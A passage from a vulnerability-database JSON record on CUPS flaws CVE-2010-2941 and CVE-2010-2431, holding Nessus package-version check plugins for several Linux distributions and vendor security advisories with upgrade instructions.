audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"cups-1.4.2-35.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"cups-devel-1.4.2-35.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"cups-libs-1.4.2-35.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"cups-lpd-1.4.2-35.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"cups-php-1.4.2-35.el6_0.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cups / cups-devel / cups-libs / cups-lpd / cups-php\");\n}\n", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:11:21", "bulletinFamily": "scanner", "description": "This update fixes a cupsd memory corruption vulnerability\n(CVE-2010-2941).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2016-05-11T00:00:00", "published": "2010-11-23T00:00:00", "id": "FEDORA_2010-17627.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=50685", "title": "Fedora 12 : cups-1.4.4-11.fc12 (2010-17627)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2010-17627.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50685);\n script_version(\"$Revision: 1.10 $\");\n script_cvs_date(\"$Date: 2016/05/11 13:24:18 $\");\n\n script_cve_id(\"CVE-2010-2941\");\n script_bugtraq_id(44530);\n script_xref(name:\"FEDORA\", value:\"2010-17627\");\n\n script_name(english:\"Fedora 12 : cups-1.4.4-11.fc12 (2010-17627)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes a cupsd memory corruption vulnerability\n(CVE-2010-2941).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=624438\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-November/051277.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a3efb292\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected cups package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release 
([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^12([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 12.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC12\", reference:\"cups-1.4.4-11.fc12\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cups\");\n}\n", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:11:21", "bulletinFamily": "scanner", "description": "This update fixes a cupsd memory corruption vulnerability\n(CVE-2010-2941), as well as fixing a crash when the MIME database\ncannot be loaded for any reason.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2016-05-11T00:00:00", "published": "2010-11-23T00:00:00", "id": "FEDORA_2010-17615.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=50684", "title": "Fedora 13 : cups-1.4.4-11.fc13 (2010-17615)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2010-17615.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50684);\n script_version(\"$Revision: 1.10 $\");\n script_cvs_date(\"$Date: 2016/05/11 13:24:18 $\");\n\n script_cve_id(\"CVE-2010-2941\");\n script_bugtraq_id(44530);\n script_xref(name:\"FEDORA\", value:\"2010-17615\");\n\n script_name(english:\"Fedora 13 : cups-1.4.4-11.fc13 (2010-17615)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes a cupsd memory corruption vulnerability\n(CVE-2010-2941), as well as fixing a crash when the MIME database\ncannot be loaded for any reason.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=624438\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-November/051301.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b2de2e22\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected cups package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:13\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release 
([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^13([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 13.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC13\", reference:\"cups-1.4.4-11.fc13\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cups\");\n}\n", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:11:22", "bulletinFamily": "scanner", "description": "New cups packages are available for Slackware 12.0, 12.1, 12.2, 13.0,\n13.1, and -current to fix security issues.", "modified": "2016-05-12T00:00:00", "published": "2010-11-30T00:00:00", "id": "SLACKWARE_SSA_2010-333-01.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=50832", "title": "Slackware 12.0 / 12.1 / 12.2 / 13.0 / 13.1 / current : cups (SSA:2010-333-01)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2010-333-01. 
The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50832);\n script_version(\"$Revision: 1.9 $\");\n script_cvs_date(\"$Date: 2016/05/12 14:46:31 $\");\n\n script_cve_id(\"CVE-2010-2941\");\n script_bugtraq_id(44530);\n script_xref(name:\"SSA\", value:\"2010-333-01\");\n\n script_name(english:\"Slackware 12.0 / 12.1 / 12.2 / 13.0 / 13.1 / current : cups (SSA:2010-333-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New cups packages are available for Slackware 12.0, 12.1, 12.2, 13.0,\n13.1, and -current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2010&m=slackware-security.468323\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fdeb2125\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected cups package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.2\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"12.0\", pkgname:\"cups\", pkgver:\"1.3.11\", pkgarch:\"i486\", pkgnum:\"1_slack12.0\")) flag++;\n\nif (slackware_check(osver:\"12.1\", pkgname:\"cups\", pkgver:\"1.3.11\", pkgarch:\"i486\", pkgnum:\"1_slack12.1\")) flag++;\n\nif (slackware_check(osver:\"12.2\", pkgname:\"cups\", pkgver:\"1.3.11\", pkgarch:\"i486\", pkgnum:\"1_slack12.2\")) flag++;\n\nif (slackware_check(osver:\"13.0\", pkgname:\"cups\", pkgver:\"1.3.11\", pkgarch:\"i486\", pkgnum:\"2_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"cups\", pkgver:\"1.3.11\", pkgarch:\"x86_64\", pkgnum:\"2_slack13.0\")) flag++;\n\nif 
(slackware_check(osver:\"13.1\", pkgname:\"cups\", pkgver:\"1.4.5\", pkgarch:\"i486\", pkgnum:\"1_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"cups\", pkgver:\"1.4.5\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"cups\", pkgver:\"1.4.5\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"cups\", pkgver:\"1.4.5\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:14:22", "bulletinFamily": "scanner", "description": "A use-after-free flaw was found in the way the CUPS server parsed\nInternet Printing Protocol (IPP) packets. A malicious user able to\nsend IPP requests to the CUPS server could use this flaw to crash the\nCUPS server or, potentially, execute arbitrary code with the\nprivileges of the CUPS server. (CVE-2010-2941)\n\nA possible privilege escalation flaw was found in CUPS. 
An\nunprivileged process running as the 'lp' user (such as a compromised\nexternal filter program spawned by the CUPS server) could trick the\nCUPS server into overwriting arbitrary files as the root user.\n(CVE-2010-2431)\n\nAfter installing this update, the cupsd daemon will be restarted\nautomatically.", "modified": "2019-01-02T00:00:00", "published": "2012-08-01T00:00:00", "id": "SL_20101028_CUPS_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=60881", "title": "Scientific Linux Security Update : cups on SL5.x i386/x86_64", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(60881);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/01/02 10:36:43\");\n\n script_cve_id(\"CVE-2010-2431\", \"CVE-2010-2941\");\n\n script_name(english:\"Scientific Linux Security Update : cups on SL5.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A use-after-free flaw was found in the way the CUPS server parsed\nInternet Printing Protocol (IPP) packets. A malicious user able to\nsend IPP requests to the CUPS server could use this flaw to crash the\nCUPS server or, potentially, execute arbitrary code with the\nprivileges of the CUPS server. (CVE-2010-2941)\n\nA possible privilege escalation flaw was found in CUPS. 
An\nunprivileged process running as the 'lp' user (such as a compromised\nexternal filter program spawned by the CUPS server) could trick the\nCUPS server into overwriting arbitrary files as the root user.\n(CVE-2010-2431)\n\nAfter installing this update, the cupsd daemon will be restarted\nautomatically.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1010&L=scientific-linux-errata&T=0&P=3729\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f6812e3b\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:M/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"cups-1.3.7-18.el5_5.8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"cups-devel-1.3.7-18.el5_5.8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"cups-libs-1.3.7-18.el5_5.8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"cups-lpd-1.3.7-18.el5_5.8\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2018-12-11T19:42:40", "bulletinFamily": "unix", "description": "The Common UNIX Printing System (CUPS) provides a portable printing layer\nfor UNIX operating systems.\n\nAn invalid free flaw was found in the way the CUPS server parsed Internet\nPrinting Protocol (IPP) packets. 
A malicious user able to send IPP requests\nto the CUPS server could use this flaw to crash the CUPS server.\n(CVE-2010-2941)\n\nRed Hat would like to thank Emmanuel Bouillon of NATO C3 Agency for\nreporting this issue.\n\nUsers of cups are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing this\nupdate, the cupsd daemon will be restarted automatically.\n", "modified": "2018-06-06T20:24:27", "published": "2010-11-10T05:00:00", "id": "RHSA-2010:0866", "href": "https://access.redhat.com/errata/RHSA-2010:0866", "type": "redhat", "title": "(RHSA-2010:0866) Important: cups security update", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T17:44:08", "bulletinFamily": "unix", "description": "The Common UNIX Printing System (CUPS) provides a portable printing layer\nfor UNIX operating systems.\n\nA use-after-free flaw was found in the way the CUPS server parsed Internet\nPrinting Protocol (IPP) packets. A malicious user able to send IPP requests\nto the CUPS server could use this flaw to crash the CUPS server or,\npotentially, execute arbitrary code with the privileges of the CUPS server.\n(CVE-2010-2941)\n\nA possible privilege escalation flaw was found in CUPS. An unprivileged\nprocess running as the \"lp\" user (such as a compromised external filter\nprogram spawned by the CUPS server) could trick the CUPS server into\noverwriting arbitrary files as the root user. (CVE-2010-2431)\n\nRed Hat would like to thank Emmanuel Bouillon of NATO C3 Agency for\nreporting the CVE-2010-2941 issue.\n\nUsers of cups are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
After installing this\nupdate, the cupsd daemon will be restarted automatically.\n", "modified": "2017-09-08T12:09:19", "published": "2010-10-28T04:00:00", "id": "RHSA-2010:0811", "href": "https://access.redhat.com/errata/RHSA-2010:0811", "type": "redhat", "title": "(RHSA-2010:0811) Important: cups security update", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "slackware": [{"lastseen": "2018-08-31T02:36:47", "bulletinFamily": "unix", "description": "New cups packages are available for Slackware 12.0, 12.1, 12.2, 13.0, 13.1,\nand -current to fix security issues.\n\n\nHere are the details from the Slackware 13.1 ChangeLog:\n\npatches/packages/cups-1.4.5-i486-1_slack13.1.txz: Upgraded.\n Fixed memory corruption bugs that could lead to a denial of service\n or possibly execution of arbitrary code through a crafted IPP request.\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2941\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! 
:-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/cups-1.3.11-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/cups-1.3.11-i486-1_slack12.1.tgz\n\nUpdated package for Slackware 12.2:\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/cups-1.3.11-i486-1_slack12.2.tgz\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/cups-1.3.11-i486-2_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/cups-1.3.11-x86_64-2_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/cups-1.4.5-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/cups-1.4.5-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/cups-1.4.5-i486-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/cups-1.4.5-x86_64-1.txz\n\n\nMD5 signatures:\n\n\nInstallation instructions:\n\nUpgrade the packages as root:\n > upgradepkg cups-1.4.5-i486-1_slack13.1.txz\n\nThen, restart the cups server:\n > sh /etc/rc.d/rc.cups restart", "modified": "2010-11-29T18:40:23", "published": "2010-11-29T18:40:23", "id": "SSA-2010-333-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2010&m=slackware-security.468323", "title": "cups", "type": "slackware", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "centos": [{"lastseen": "2017-10-03T18:26:36", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2010:0811\n\n\nThe Common UNIX Printing System (CUPS) provides a portable printing layer\nfor UNIX operating systems.\n\nA use-after-free flaw was found in the way the CUPS server parsed Internet\nPrinting Protocol (IPP) packets. A malicious user able to send IPP requests\nto the CUPS server could use this flaw to crash the CUPS server or,\npotentially, execute arbitrary code with the privileges of the CUPS server.\n(CVE-2010-2941)\n\nA possible privilege escalation flaw was found in CUPS. An unprivileged\nprocess running as the \"lp\" user (such as a compromised external filter\nprogram spawned by the CUPS server) could trick the CUPS server into\noverwriting arbitrary files as the root user. (CVE-2010-2431)\n\nRed Hat would like to thank Emmanuel Bouillon of NATO C3 Agency for\nreporting the CVE-2010-2941 issue.\n\nUsers of cups are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues.
After installing this\nupdate, the cupsd daemon will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2010-November/017135.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-November/017136.html\n\n**Affected packages:**\ncups\ncups-devel\ncups-libs\ncups-lpd\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2010-0811.html", "modified": "2010-11-01T17:30:05", "published": "2010-11-01T17:28:39", "href": "http://lists.centos.org/pipermail/centos-announce/2010-November/017135.html", "id": "CESA-2010:0811", "title": "cups security update", "type": "centos", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oraclelinux": [{"lastseen": "2018-08-31T01:45:57", "bulletinFamily": "unix", "description": "[1.3.7-18:.8]\r\n- Applied patch to fix cupsd memory corruption vulnerability\r\n (CVE-2010-2941, STR #3648, bug #624438).\r\n- Fix latent privilege escalation vulnerability (CVE-2010-2431,\r\n STR #3510, bug #605397).", "modified": "2010-10-29T00:00:00", "published": "2010-10-29T00:00:00", "id": "ELSA-2010-0811", "href": "http://linux.oracle.com/errata/ELSA-2010-0811.html", "title": "cups security update", "type": "oraclelinux", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2018-10-16T22:14:10", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2176-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nMarch 02, 2011 